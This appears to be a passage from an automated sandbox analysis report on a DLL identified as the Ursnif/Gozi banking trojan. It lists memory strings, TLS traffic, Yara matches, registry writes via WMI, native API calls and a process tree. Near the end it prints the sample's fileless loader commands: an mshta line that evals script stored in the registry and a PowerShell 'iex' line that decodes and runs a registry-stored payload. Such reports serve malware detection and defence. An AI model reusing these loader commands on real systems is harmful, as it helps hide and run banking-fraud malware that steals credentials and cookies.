Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000024.00000000.431688638.0000000008BB0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	2_2_054222F7

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027734D0 NtMapViewOfSection,	2_2_027734D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02774F73 GetProcAddress,NtCreateSection,memset,	2_2_02774F73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027711A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_027711A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277B159 NtQueryVirtualMemory,	2_2_0277B159
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	2_2_0540E529
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05410D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	2_2_05410D8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	2_2_0540CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	2_2_05415E21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_0541C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05405E8A NtQueryInformationProcess,	2_2_05405E8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05422AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	2_2_05422AAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05414518 NtGetContextThread,RtlNtStatusToDosError,	2_2_05414518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_054105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	2_2_054105FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05408F6D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_05408F6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_054117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	2_2_054117CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05422E10 NtQuerySystemInformation,RtlNtStatusToDosError,	2_2_05422E10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540E6C4 memset,NtQueryInformationProcess,	2_2_0540E6C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05403934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	2_2_05403934
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	2_2_0540A818
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540F314 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_0540F314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05402A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_05402A0A

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_054235BC CreateProcessAsUserA,

2_2_054235BC

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027728E9	2_2_027728E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277AF34	2_2_0277AF34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05423C5C	2_2_05423C5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541BC93	2_2_0541BC93
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541CFA3	2_2_0541CFA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05421669	2_2_05421669
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05412678	2_2_05412678
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05413604	2_2_05413604
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0542086C	2_2_0542086C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05414804	2_2_05414804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540C307	2_2_0540C307
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540BBA1	2_2_0540BBA1

PE file does not import any functions

Source: mu1rnx1a.dll.27.dr	Static PE information: No import functions for PE file found
Source: yacmzdf3.dll.30.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll

Uses 32bit PE files

Source: NJPcHPuRcG.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Yara signature match

Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY

Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: NJPcHPuRcG.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_027731DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

2_2_027731DD

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8AE918E3-61CB-4CED-3B5E-25409F722974}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F653DE64-DD3A-98FE-178A-614C3B5E2540}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMP

Jump to behavior

Source: NJPcHPuRcG.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: NJPcHPuRcG.dll

Virustotal: Detection: 15%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2	Jump to behavior
